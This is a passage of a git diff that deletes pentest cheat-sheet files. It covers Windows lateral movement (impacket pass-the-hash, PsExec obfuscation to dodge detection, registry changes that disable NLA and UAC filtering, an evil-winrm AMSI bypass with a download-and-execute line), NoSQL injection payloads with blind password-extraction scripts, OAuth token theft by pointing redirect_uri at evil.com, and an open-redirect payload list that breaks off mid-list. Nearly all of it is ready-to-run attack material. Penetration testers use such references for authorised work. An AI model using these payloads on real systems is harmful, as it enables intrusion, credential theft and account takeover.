DOMAIN/username@10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 - ``` - -To allow Non-RID 500 local admin accounts performing Wmi or PsExec, execute: -`reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /f /d 1` -To prevent RID 500 from being able to WmiExec or PsExec, execute: -`reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken /t REG_DWORD /f /d 1` - - -### PSExec - -Instead of uploading `psexeccsv` service binary, it uploads to `ADMIN$` a service binary with an arbitrary name. -PSExec default [kavika13/RemCom](https://github.com/kavika13/RemCom) binary is 10 years old, you might want to rebuild it and obfuscate it to reduce detections ([snovvcrash/RemComObf.sh](https://gist.github.com/snovvcrash/123945e8f06c7182769846265637fedb)) - -Use a custom binary and service name with : `psexec.py Administrator:Password123@IP -service-name customservicename -remote-binary-name custombin.exe` - -Also a custom file can be specified with the parameter : `-file /tmp/RemComSvcCustom.exe`. -You need to update the pipe name to match "Custom_communication" in the line 163 - -```py -162 tid = s.connectTree('IPC$') -163 fid_main = self.openPipe(s,tid,r'\RemCom_communicaton',0x12019f) -``` - -Alternatively you can use the fork [ThePorgs/impacket](https://github.com/ThePorgs/impacket/pull/3/files). - - -### WMIExec - -Use a non default share `-share SHARE` to write the output to reduce the detection. -By default this command is executed : `cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__RANDOM 2>&1` - - -### SMBExec - -It creates a service with the name `BTOBTO` ([smbexec.py#L59](https://github.com/fortra/impacket/blob/master/examples/smbexec.py#L59)) and transfers commands from the attacker in a bat file in `%TEMP/execute.bat` ([smbexec.py#L56](https://github.com/fortra/impacket/blob/master/examples/smbexec.py#L56)). - -```py -OUTPUT_FILENAME = '__output' -BATCH_FILENAME = 'execute.bat' -SMBSERVER_DIR = '__tmp' -DUMMY_SHARE = 'TMP' -SERVICE_NAME = 'BTOBTO' -``` - -It will create a new service every time we execute a command. It will also generate an Event 7045. - -By default this command is executed: `%COMSPEC% /Q /c echo dir > \\127.0.0.1\C$\__output 2>&1 > %TEMP%\execute.bat & %COMSPEC% /Q /c %TEMP%\execute.bat & del %TEMP%\execute.bat`, where `%COMSPEC%` points to `C:\WINDOWS\system32\cmd.exe`. - -```py -class RemoteShell(cmd.Cmd): - def __init__(self, share, rpc, mode, serviceName, shell_type): - cmd.Cmd.__init__(self) - self.__share = share - self.__mode = mode - self.__output = '\\\\127.0.0.1\\' + self.__share + '\\' + OUTPUT_FILENAME - self.__batchFile = '%TEMP%\\' + BATCH_FILENAME - self.__outputBuffer = b'' - self.__command = '' - self.__shell = '%COMSPEC% /Q /c ' - self.__shell_type = shell_type - self.__pwsh = 'powershell.exe -NoP -NoL -sta -NonI -W Hidden -Exec Bypass -Enc ' - self.__serviceName = serviceName -``` - - -## RDP Remote Desktop Protocol - -:warning: **NOTE**: You may need to enable RDP and disable NLA and fix CredSSP errors. - -```powershell -# Enable RDP -PS C:\> reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f -PS C:\> netsh firewall set service remoteadmin enable -PS C:\> netsh firewall set service remotedesktop enable -# Alternative -C:\> psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 -root@payload$ crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable - -# Fix CredSSP errors -reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f -reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f - -# Disable NLA -PS > (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName "PC01" -Filter "TerminalName='RDP-tcp'").UserAuthenticationRequired -PS > (Get-WmiObject -class "Win32_TSGeneralSetting" -Namespace root\cimv2\terminalservices -ComputerName "PC01" -Filter "TerminalName='RDP-tcp'").SetUserAuthenticationRequired(0) -``` - -Abuse RDP protocol to execute commands remotely with the following commands; - -* `rdesktop` - ```powershell - root@payload$ rdesktop -d DOMAIN -u username -p password 10.10.10.10 -g 70 -r disk:share=/home/user/myshare - root@payload$ rdesktop -u username -p password -g 70% -r disk:share=/tmp/myshare 10.10.10.10 - # -g : the screen will take up 70% of your actual screen size - # -r disk:share : sharing a local folder during a remote desktop session - ``` -* `freerdp` - ```powershell - root@payload$ xfreerdp /v:10.0.0.1 /u:'Username' /p:'Password123!' +clipboard /cert-ignore /size:1366x768 /smart-sizing - root@payload$ xfreerdp /v:10.0.0.1 /u:username # password will be asked - - # pass the hash using Restricted Admin, need an admin account not in the "Remote Desktop Users" group. - # pass the hash works for Server 2012 R2 / Win 8.1+ - # require freerdp2-x11 freerdp2-shadow-x11 packages instead of freerdp-x11 - root@payload$ xfreerdp /v:10.0.0.1 /u:username /d:domain /pth:88a405e17c0aa5debbc9b5679753939d - ``` -* [SharpRDP](https://github.com/0xthirteen/SharpRDP) - ```powershell - PS C:\> SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password - ``` - - -## Powershell Remoting Protocol - -### Powershell Credentials - -```ps1 -PS> $pass = ConvertTo-SecureString 'supersecurepassword' -AsPlainText -Force -PS> $cred = New-Object System.Management.Automation.PSCredential ('DOMAIN\Username', $pass) -``` - -### Powershell PSSESSION - -* Enable PSRemoting on the host - ```ps1 - Enable-PSRemoting -Force - net start winrm - - # Add the machine to the trusted hosts - Set-Item wsman:\localhost\client\trustedhosts * - Set-Item WSMan:\localhost\Client\TrustedHosts -Value "10.10.10.10" - ``` - -* Execute a single command - ```powershell - PS> Invoke-Command -ComputerName DC -Credential $cred -ScriptBlock { whoami } - PS> Invoke-Command -computername DC01,CLIENT1 -scriptBlock { Get-Service } - PS> Invoke-Command -computername DC01,CLIENT1 -filePath c:\Scripts\Task.ps1 - ``` - -* Interact with a PS Session - ```powershell - PS> Enter-PSSession -computerName DC01 - [DC01]: PS> - - # one-to-one execute scripts and commands - PS> $Session = New-PSSession -ComputerName CLIENT1 - PS> Invoke-Command -Session $Session -scriptBlock { $test = 1 } - PS> Invoke-Command -Session $Session -scriptBlock { $test } - 1 - ``` - - -### Powershell Secure String - -```ps1 -$aesKey = (49, 222, 253, 86, 26, 137, 92, 43, 29, 200, 17, 203, 88, 97, 39, 38, 60, 119, 46, 44, 219, 179, 13, 194, 191, 199, 78, 10, 4, 40, 87, 159) -$secureObject = ConvertTo-SecureString -String "76492d11167[SNIP]MwA4AGEAYwA1AGMAZgA=" -Key $aesKey -$decrypted = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureObject) -$decrypted = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($decrypted) -$decrypted -``` - - -## WinRM Protocol - -**Requirements**: -* Port **5985** or **5986** open. -* Default endpoint is **/wsman** - -If WinRM is disabled on the system you can enable it using: `winrm quickconfig` - -The easiest way to interact over WinRM on Linux is with [Hackplayers/evil-winrm](https://github.com/Hackplayers/evil-winrm) -```powershell -evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-H HASH] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] [-r REALM] -evil-winrm -i 10.0.0.20 -u username -H HASH -evil-winrm -i 10.0.0.20 -u username -p password -r domain.local - -*Evil-WinRM* PS > Bypass-4MSI -*Evil-WinRM* PS > IEX([Net.Webclient]::new().DownloadString("http://127.0.0.1/PowerView.ps1")) -``` - - -## WMI Protocol - -```powershell -PS C:\> wmic /node:target.domain /user:domain\user /password:password process call create "C:\Windows\System32\calc.exe” -``` - - -## SSH Protocol - -:warning: You cannot pass the hash to SSH, but you can connect with a Kerberos ticket (Which you can get by passing the hash!) - -```ps1 -cp user.ccache /tmp/krb5cc_1045 -ssh -o GSSAPIAuthentication=yes user@domain.local -vv -``` - - -## Other methods - -### PsExec - Sysinternal - -From Windows - [Sysinternal](https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite) - -```powershell -PS C:\> PsExec.exe \\srv01.domain.local -u DOMAIN\username -p password cmd.exe - -# switch admin user to NT Authority/System -PS C:\> PsExec.exe \\srv01.domain.local -u DOMAIN\username -p password cmd.exe -s -``` - -### Mount a remote share - -```powershell -PS C:\> net use \\srv01.domain.local /user:DOMAIN\username password C$ -``` - -### Runas as another user - -Runas is a command-line tool that is built into Windows Vista. -Allows a user to run specific tools and programs with different permissions than the user's current logon provides. - -```powershell -PS C:\> runas /netonly /user:DOMAIN\username "cmd.exe" -PS C:\> runas /noprofil /netonly /user:DOMAIN\username cmd.exe -``` - -## References - -- [Ropnop - Using credentials to own Windows boxes](https://blog.ropnop.com/using-credentials-to-own-windows-boxes/) -- [Ropnop - Using credentials to own Windows boxes Part 2](https://blog.ropnop.com/using-credentials-to-own-windows-boxes-part-2-psexec-and-services/) -- [Gaining Domain Admin from Outside Active Directory](https://markitzeroday.com/pass-the-hash/crack-map-exec/2018/03/04/da-from-outside-the-domain.html) -- [Impacket Remote code execution on Windows from Linux by Vry4n_ - Jun 20, 2021](https://vk9-sec.com/impacket-remote-code-execution-rce-on-windows-from-linux/) -- [Impacket Exec Commands Cheat Sheet - 13cubed](https://www.13cubed.com/downloads/impacket_exec_commands_cheat_sheet.pdf) -- [SMB protocol cheatsheet - aas-s3curity](https://aas-s3curity.gitbook.io/cheatsheet/internalpentest/active-directory/post-exploitation/lateral-movement/smb-protocol) -- [Windows Lateral Movement with smb, psexec and alternatives - nv2lt](https://nv2lt.github.io/windows/smb-psexec-smbexec-winexe-how-to/) -- [PsExec.exe IOCs and Detection - Threatexpress](https://threatexpress.com/redteaming/tool_ioc/psexec/) -- [A Dive on SMBEXEC - dmcxblue - 8th Feb 2021](https://0x00sec.org/t/a-dive-on-smbexec/24961) \ No newline at end of file diff --git a/NoSQL Injection/Intruder/NoSQL.txt b/NoSQL Injection/Intruder/NoSQL.txt deleted file mode 100644 index 535cb4d..0000000 --- a/NoSQL Injection/Intruder/NoSQL.txt +++ /dev/null @@ -1,25 +0,0 @@ -true, $where: '1 == 1' -, $where: '1 == 1' -$where: '1 == 1' -', $where: '1 == 1' -1, $where: '1 == 1' -{ $ne: 1 } -', $or: [ {}, { 'a':'a -' } ], $comment:'successful MongoDB injection' -db.injection.insert({success:1}); -db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 -|| 1==1 -' && this.password.match(/.*/)//+%00 -' && this.passwordzz.match(/.*/)//+%00 -'%20%26%26%20this.password.match(/.*/)//+%00 -'%20%26%26%20this.passwordzz.match(/.*/)//+%00 -{$gt: ''} -{"$gt": ""} -[$ne]=1 -';sleep(5000); -';sleep(5000);' -';sleep(5000);+' -';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000); -';return 'a'=='a' && ''==' -";return(true);var xyz='a -0;return true \ No newline at end of file diff --git a/NoSQL Injection/README.md b/NoSQL Injection/README.md deleted file mode 100644 index feb3981..0000000 --- a/NoSQL Injection/README.md +++ /dev/null @@ -1,221 +0,0 @@ -# NoSQL Injection - -> NoSQL databases provide looser consistency restrictions than traditional SQL databases. By requiring fewer relational constraints and consistency checks, NoSQL databases often offer performance and scaling benefits. Yet these databases are still potentially vulnerable to injection attacks, even if they aren't using the traditional SQL syntax. - -## Summary - -* [Tools](#tools) -* [Exploit](#exploits) - * [Authentication Bypass](#authentication-bypass) - * [Extract length information](#extract-length-information) - * [Extract data information](#extract-data-information) -* [Blind NoSQL](#blind-nosql) - * [POST with JSON body](#post-with-json-body) - * [POST with urlencoded body](#post-with-urlencoded-body) - * [GET](#get) -* [MongoDB Payloads](#mongodb-payloads) -* [References](#references) - -## Tools - -* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap) -* [nosqlilab - A lab for playing with NoSQL Injection](https://github.com/digininja/nosqlilab) -* [Burp-NoSQLiScanner - Plugin available in burpsuite](https://github.com/matrix/Burp-NoSQLiScanner) - -## Exploit - -### Authentication Bypass - -Basic authentication bypass using not equal ($ne) or greater ($gt) - -```json -in DATA -username[$ne]=toto&password[$ne]=toto -login[$regex]=a.*&pass[$ne]=lol -login[$gt]=admin&login[$lt]=test&pass[$ne]=1 -login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto - -in JSON -{"username": {"$ne": null}, "password": {"$ne": null}} -{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}} -{"username": {"$gt": undefined}, "password": {"$gt": undefined}} -{"username": {"$gt":""}, "password": {"$gt":""}} -``` - -### Extract length information - -```json -username[$ne]=toto&password[$regex]=.{1} -username[$ne]=toto&password[$regex]=.{3} -``` - -### Extract data information - -```json -in URL -username[$ne]=toto&password[$regex]=m.{2} -username[$ne]=toto&password[$regex]=md.{1} -username[$ne]=toto&password[$regex]=mdp - -username[$ne]=toto&password[$regex]=m.* -username[$ne]=toto&password[$regex]=md.* - -in JSON -{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }} -{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }} -{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }} -``` - -Extract data with "in" - -```json -{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}} -``` - -### SSJI - -```json -';return 'a'=='a' && ''==' -";return 'a'=='a' && ''==' -0;return true -``` - - -## Blind NoSQL - -### POST with JSON body - -python script: - -```python -import requests -import urllib3 -import string -import urllib -urllib3.disable_warnings() - -username="admin" -password="" -u="http://example.org/login" -headers={'content-type': 'application/json'} - -while True: - for c in string.printable: - if c not in ['*','+','.','?','|']: - payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c) - r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False) - if 'OK' in r.text or r.status_code == 302: - print("Found one more char : %s" % (password+c)) - password += c -``` - -### POST with urlencoded body - -python script: - -```python -import requests -import urllib3 -import string -import urllib -urllib3.disable_warnings() - -username="admin" -password="" -u="http://example.org/login" -headers={'content-type': 'application/x-www-form-urlencoded'} - -while True: - for c in string.printable: - if c not in ['*','+','.','?','|','&','$']: - payload='user=%s&pass[$regex]=^%s&remember=on' % (username, password + c) - r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False) - if r.status_code == 302 and r.headers['Location'] == '/dashboard': - print("Found one more char : %s" % (password+c)) - password += c -``` - -### GET - -python script: - -```python -import requests -import urllib3 -import string -import urllib -urllib3.disable_warnings() - -username='admin' -password='' -u='http://example.org/login' - -while True: - for c in string.printable: - if c not in ['*','+','.','?','|', '#', '&', '$']: - payload=f"?username={username}&password[$regex]=^{password + c}" - r = requests.get(u + payload) - if 'Yeah' in r.text: - print(f"Found one more char : {password+c}") - password += c -``` - -ruby script: - -```ruby -require 'httpx' - -username = 'admin' -password = '' -url = 'http://example.org/login' -# CHARSET = (?!..?~).to_a # all ASCII printable characters -CHARSET = [*'0'..'9',*'a'..'z','-'] # alphanumeric + '-' -GET_EXCLUDE = ['*','+','.','?','|', '#', '&', '$'] -session = HTTPX.plugin(:persistent) - -while true - CHARSET.each do |c| - unless GET_EXCLUDE.include?(c) - payload = "?username=#{username}&password[$regex]=^#{password + c}" - res = session.get(url + payload) - if res.body.to_s.match?('Yeah') - puts "Found one more char : #{password + c}" - password += c - end - end - end -end -``` - -## MongoDB Payloads - -```bash -true, $where: '1 == 1' -, $where: '1 == 1' -$where: '1 == 1' -', $where: '1 == 1' -1, $where: '1 == 1' -{ $ne: 1 } -', $or: [ {}, { 'a':'a -' } ], $comment:'successful MongoDB injection' -db.injection.insert({success:1}); -db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1 -|| 1==1 -' && this.password.match(/.*/)//+%00 -' && this.passwordzz.match(/.*/)//+%00 -'%20%26%26%20this.password.match(/.*/)//+%00 -'%20%26%26%20this.passwordzz.match(/.*/)//+%00 -{$gt: ''} -[$ne]=1 -';return 'a'=='a' && ''==' -";return(true);var xyz='a -0;return true -``` - -## References - -* [Les NOSQL injections Classique et Blind: Never trust user input - Geluchat](https://www.dailysecurity.fr/nosql-injections-classique-blind/) -* [Testing for NoSQL injection - OWASP/WSTG](https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection) -* [NoSQL injection wordlists - cr0hn](https://github.com/cr0hn/nosqlinjection_wordlists) -* [NoSQL Injection in MongoDB - JUL 17, 2016 - Zanon](https://zanon.io/posts/nosql-injection-in-mongodb) -* [Burp-NoSQLiScanner](https://github.com/matrix/Burp-NoSQLiScanner/blob/main/src/burp/BurpExtender.java) diff --git a/OAuth Misconfiguration/README.md b/OAuth Misconfiguration/README.md deleted file mode 100644 index 71c0800..0000000 --- a/OAuth Misconfiguration/README.md +++ /dev/null @@ -1,80 +0,0 @@ -# OAuth Misconfiguration - -## Summary - -- [Stealing OAuth Token via referer](#stealing-oauth-token-via-referer) -- [Grabbing OAuth Token via redirect_uri](#grabbing-oauth-token-via-redirect---uri) -- [Executing XSS via redirect_uri](#executing-xss-via-redirect---uri) -- [OAuth private key disclosure](#oauth-private-key-disclosure) -- [Authorization Code Rule Violation](#authorization-code-rule-violation) -- [Cross-Site Request Forgery](#cross-site-request-forgery) -- [References](#references) - -## Stealing OAuth Token via referer - -From [@abugzlife1](https://twitter.com/abugzlife1/status/1125663944272748544) tweet. - -> Do you have HTML injection but can't get XSS? Are there any OAuth implementations on the site? If so, setup an img tag to your server and see if there's a way to get the victim there (redirect, etc.) after login to steal OAuth tokens via referer - -## Grabbing OAuth Token via redirect_uri - -Redirect to a controlled domain to get the access token - -```powershell -https://www.example.com/signin/authorize?[...]&redirect_uri=https://demo.example.com/loginsuccessful -https://www.example.com/signin/authorize?[...]&redirect_uri=https://localhost.evil.com -``` - -Redirect to an accepted Open URL in to get the access token - -```powershell -https://www.example.com/oauth20_authorize.srf?[...]&redirect_uri=https://accounts.google.com/BackToAuthSubTarget?next=https://evil.com -https://www.example.com/oauth2/authorize?[...]&redirect_uri=https%3A%2F%2Fapps.facebook.com%2Fattacker%2F -``` - -OAuth implementations should never whitelist entire domains, only a few URLs so that “redirect_uri” can’t be pointed to an Open Redirect. - -Sometimes you need to change the scope to an invalid one to bypass a filter on redirect_uri: - -```powershell -https://www.example.com/admin/oauth/authorize?[...]&scope=a&redirect_uri=https://evil.com -``` - -## Executing XSS via redirect_uri - -```powershell -https://example.com/oauth/v1/authorize?[...]&redirect_uri=data%3Atext%2Fhtml%2Ca&state= -``` - -## OAuth private key disclosure - -Some Android/iOS app can be decompiled and the OAuth Private key can be accessed. - -## Authorization Code Rule Violation - -> The client MUST NOT use the authorization code more than once. -If an authorization code is used more than once, the authorization server MUST deny the request -and SHOULD revoke (when possible) all tokens previously issued based on that authorization code. - -## Cross-Site Request Forgery - -Applications that do not check for a valid CSRF token in the OAuth callback are vulnerable. This can be exploited by initializing the OAuth flow and intercepting the callback (`https://example.com/callback?code=AUTHORIZATION_CODE`). This URL can be used in CSRF attacks. - -> The client MUST implement CSRF protection for its redirection URI. This is typically accomplished by requiring any request sent to the redirection URI endpoint to include a value that binds the request to the user-agent's authenticated state. The client SHOULD utilize the "state" request parameter to deliver this value to the authorization server when making an authorization request. - -## Labs - -* [Authentication bypass via OAuth implicit flow](https://portswigger.net/web-security/oauth/lab-oauth-authentication-bypass-via-oauth-implicit-flow) -* [Forced OAuth profile linking](https://portswigger.net/web-security/oauth/lab-oauth-forced-oauth-profile-linking) -* [OAuth account hijacking via redirect_uri](https://portswigger.net/web-security/oauth/lab-oauth-account-hijacking-via-redirect-uri) -* [Stealing OAuth access tokens via a proxy page](https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-a-proxy-page) -* [Stealing OAuth access tokens via an open redirect](https://portswigger.net/web-security/oauth/lab-oauth-stealing-oauth-access-tokens-via-an-open-redirect) - - -## References - -* [All your Paypal OAuth tokens belong to me - localhost for the win - INTO THE SYMMETRY](http://blog.intothesymmetry.com/2016/11/all-your-paypal-tokens-belong-to-me.html) -* [OAuth 2 - How I have hacked Facebook again (..and would have stolen a valid access token) - INTO THE SYMMETRY](http://intothesymmetry.blogspot.ch/2014/04/oauth-2-how-i-have-hacked-facebook.html) -* [How I hacked Github again. - Egor Homakov](http://homakov.blogspot.ch/2014/02/how-i-hacked-github-again.html) -* [How Microsoft is giving your data to Facebook… and everyone else - Andris Atteka](http://andrisatteka.blogspot.ch/2014/09/how-microsoft-is-giving-your-data-to.html) -- [Bypassing Google Authentication on Periscope's Administration Panel](https://whitton.io/articles/bypassing-google-authentication-on-periscopes-admin-panel/) By Jack Whitton \ No newline at end of file diff --git a/Open Redirect/Intruder/Open-Redirect-payloads.txt b/Open Redirect/Intruder/Open-Redirect-payloads.txt deleted file mode 100644 index 4444e33..0000000 --- a/Open Redirect/Intruder/Open-Redirect-payloads.txt +++ /dev/null @@ -1,240 +0,0 @@ -//google.com/%2f.. -//www.whitelisteddomain.tld@google.com/%2f.. -///google.com/%2f.. -///www.whitelisteddomain.tld@google.com/%2f.. -////google.com/%2f.. -////www.whitelisteddomain.tld@google.com/%2f.. -https://google.com/%2f.. -https://www.whitelisteddomain.tld@google.com/%2f.. -/https://google.com/%2f.. -/https://www.whitelisteddomain.tld@google.com/%2f.. -//www.google.com/%2f%2e%2e -//www.whitelisteddomain.tld@www.google.com/%2f%2e%2e -///www.google.com/%2f%2e%2e -///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e -////www.google.com/%2f%2e%2e -////www.whitelisteddomain.tld@www.google.com/%2f%2e%2e -https://www.google.com/%2f%2e%2e -https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e -/https://www.google.com/%2f%2e%2e -/https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e -//google.com/ -//www.whitelisteddomain.tld@google.com/ -///google.com/ -///www.whitelisteddomain.tld@google.com/ -////google.com/ -////www.whitelisteddomain.tld@google.com/ -https://google.com/ -https://www.whitelisteddomain.tld@google.com/ -/https://google.com/ -/https://www.whitelisteddomain.tld@google.com/ -//google.com// -//www.whitelisteddomain.tld@google.com// -///google.com// -///www.whitelisteddomain.tld@google.com// -////google.com// -////www.whitelisteddomain.tld@google.com// -https://google.com// -https://www.whitelisteddomain.tld@google.com// -//https://google.com// -//https://www.whitelisteddomain.tld@google.com// -//www.google.com/%2e%2e%2f -//www.whitelisteddomain.tld@www.google.com/%2e%2e%2f -///www.google.com/%2e%2e%2f -///www.whitelisteddomain.tld@www.google.com/%2e%2e%2f -////www.google.com/%2e%2e%2f -////www.whitelisteddomain.tld@www.google.com/%2e%2e%2f -https://www.google.com/%2e%2e%2f -https://www.whitelisteddomain.tld@www.google.com/%2e%2e%2f -//https://www.google.com/%2e%2e%2f -//https://www.whitelisteddomain.tld@www.google.com/%2e%2e%2f -///www.google.com/%2e%2e -///www.whitelisteddomain.tld@www.google.com/%2e%2e -////www.google.com/%2e%2e -////www.whitelisteddomain.tld@www.google.com/%2e%2e -https:///www.google.com/%2e%2e -https:///www.whitelisteddomain.tld@www.google.com/%2e%2e -//https:///www.google.com/%2e%2e -//www.whitelisteddomain.tld@https:///www.google.com/%2e%2e -/https://www.google.com/%2e%2e -/https://www.whitelisteddomain.tld@www.google.com/%2e%2e -///www.google.com/%2f%2e%2e -///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e -////www.google.com/%2f%2e%2e -////www.whitelisteddomain.tld@www.google.com/%2f%2e%2e -https:///www.google.com/%2f%2e%2e -https:///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e -/https://www.google.com/%2f%2e%2e -/https://www.whitelisteddomain.tld@www.google.com/%2f%2e%2e -/https:///www.google.com/%2f%2e%2e -/https:///www.whitelisteddomain.tld@www.google.com/%2f%2e%2e -/%09/google.com -/%09/www.whitelisteddomain.tld@google.com -//%09/google.com -//%09/www.whitelisteddomain.tld@google.com -///%09/google.com -///%09/www.whitelisteddomain.tld@google.com -////%09/google.com -////%09/www.whitelisteddomain.tld@google.com -https://%09/google.com -https://%09/www.whitelisteddomain.tld@google.com -/%5cgoogle.com -/%5cwww.whitelisteddomain.tld@google.com -//%5cgoogle.com -//%5cwww.whitelisteddomain.tld@google.com -///%5cgoogle.com -///%5cwww.whitelisteddomain.tld@google.com -////%5cgoogle.com -////%5cwww.whitelisteddomain.tld@google.com -https://%5cgoogle.com -https://%5cwww.whitelisteddomain.tld@google.com -/https://%5cgoogle.com -/https://%5cwww.whitelisteddomain.tld@google.com -https://google.com -https://www.whitelisteddomain.tld@google.com -javascript:alert(1); -javascript:alert(1) -//javascript:alert(1); -/javascript:alert(1); -//javascript:alert(1) -/javascript:alert(1) -/%5cjavascript:alert(1); -/%5cjavascript:alert(1) -//%5cjavascript:alert(1); -//%5cjavascript:alert(1) -/%09/javascript:alert(1); -/%09/javascript:alert(1) -java%0d%0ascript%0d%0a:alert(0) -//google.com -https:google.com -//google%E3%80%82com -\/\/google.com/ -/\/google.com/ -//google%00.com -https://www.whitelisteddomain.tld/https://www.google.com/ -";alert(0);// -javascript://www.whitelisteddomain.tld?%a0alert%281%29 -http://0xd8.0x3a.0xd6.0xce -http://www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce -http://3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce -http://XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce -http://0xd83ad6ce -http://www.whitelisteddomain.tld@0xd83ad6ce -http://3H6k7lIAiqjfNeN@0xd83ad6ce -http://XY>.7d8T\205pZM@0xd83ad6ce -http://3627734734 -http://www.whitelisteddomain.tld@3627734734 -http://3H6k7lIAiqjfNeN@3627734734 -http://XY>.7d8T\205pZM@3627734734 -http://472.314.470.462 -http://www.whitelisteddomain.tld@472.314.470.462 -http://3H6k7lIAiqjfNeN@472.314.470.462 -http://XY>.7d8T\205pZM@472.314.470.462 -http://0330.072.0326.0316 -http://www.whitelisteddomain.tld@0330.072.0326.0316 -http://3H6k7lIAiqjfNeN@0330.072.0326.0316 -http://XY>.7d8T\205pZM@0330.072.0326.0316 -http://00330.00072.0000326.00000316 -http://www.whitelisteddomain.tld@00330.00072.0000326.00000316 -http://3H6k7lIAiqjfNeN@00330.00072.0000326.00000316 -http://XY>.7d8T\205pZM@00330.00072.0000326.00000316 -http://[::216.58.214.206] -http://www.whitelisteddomain.tld@[::216.58.214.206] -http://3H6k7lIAiqjfNeN@[::216.58.214.206] -http://XY>.7d8T\205pZM@[::216.58.214.206] -http://[::ffff:216.58.214.206] -http://www.whitelisteddomain.tld@[::ffff:216.58.214.206] -http://3H6k7lIAiqjfNeN@[::ffff:216.58.214.206] -http://XY>.7d8T\205pZM@[::ffff:216.58.214.206] -http://0xd8.072.54990 -http://www.whitelisteddomain.tld@0xd8.072.54990 -http://3H6k7lIAiqjfNeN@0xd8.072.54990 -http://XY>.7d8T\205pZM@0xd8.072.54990 -http://0xd8.3856078 -http://www.whitelisteddomain.tld@0xd8.3856078 -http://3H6k7lIAiqjfNeN@0xd8.3856078 -http://XY>.7d8T\205pZM@0xd8.3856078 -http://00330.3856078 -http://www.whitelisteddomain.tld@00330.3856078 -http://3H6k7lIAiqjfNeN@00330.3856078 -http://XY>.7d8T\205pZM@00330.3856078 -http://00330.0x3a.54990 -http://www.whitelisteddomain.tld@00330.0x3a.54990 -http://3H6k7lIAiqjfNeN@00330.0x3a.54990 -http://XY>.7d8T\205pZM@00330.0x3a.54990 -http:0xd8.0x3a.0xd6.0xce -http:www.whitelisteddomain.tld@0xd8.0x3a.0xd6.0xce -http:3H6k7lIAiqjfNeN@0xd8.0x3a.0xd6.0xce -http:XY>.7d8T\205pZM@0xd8.0x3a.0xd6.0xce -http:0xd83ad6ce -http:www.whitelisteddomain.tld@0xd83ad6ce -http:3H6k7lIAiqjfNeN@0xd83ad6ce -http:XY>.7d8T\205pZM@0xd83ad6ce -http:3627734734 -http:www.whitelisteddomain.tld@3627734734 -http:3H6k7lIAiqjfNeN@3627734734 -http:XY>.7d8T\205pZM@3627734734 -http:472.314.470.462 -http:www.whitelisteddomain.tld@472.314.470.462 -http:3H6k7lIAiqjfNeN@472.314.470.462 -http:XY>.7d8T\205pZM@472.314.470.462 -http:0330.072.0326.0316 -http:www.whitelisteddomain.tld@0330.072.0326.0316 -http:3H6k7lIAiqjfNeN@0330.072.0326.0316 -http:XY>.7d8T\205pZM@0330.072.0326.0316 -http:00330.00072.0000326.00000316 -http:www.whitelisteddomain.tld@00330.00072.0000326.00000316 -http:3H6k7lIAiqjfNeN@00330.00072.0000326.00000316 -http:XY>.7d8T\205pZM@00330.00072.0000326.00000316 -http:[::216.58.214.206] -http:www.whitelisteddomain.tld@[::216.58.214.206] -http:3H6k7lIAiqjfNeN@[::216.58.214.206] -http:XY>.7d8T\205pZM@[::216.58.214.206] -http:[::ffff:216.58.214.206] -http:www.whitelisteddomain.tld@[::ffff:216.58.214.206] -http:3H6k7lIAiqjfNeN@[::ffff:216.58.214.206] -http:XY>.7d8T\205pZM@[::ffff:216.58.214.206] -http:0xd8.072.54990 -http:www.whitelisteddomain.tld@0xd8.072.54990 -http:3H6k7lIAiqjfNeN@0xd8.072.54990 -http:XY>.7d8T\205pZM@0xd8.072.54990 -http:0xd8.3856078 -http:www.whitelisteddomain.tld@0xd8.3856078 -http:3H6k7lIAiqjfNeN@0xd8.3856078 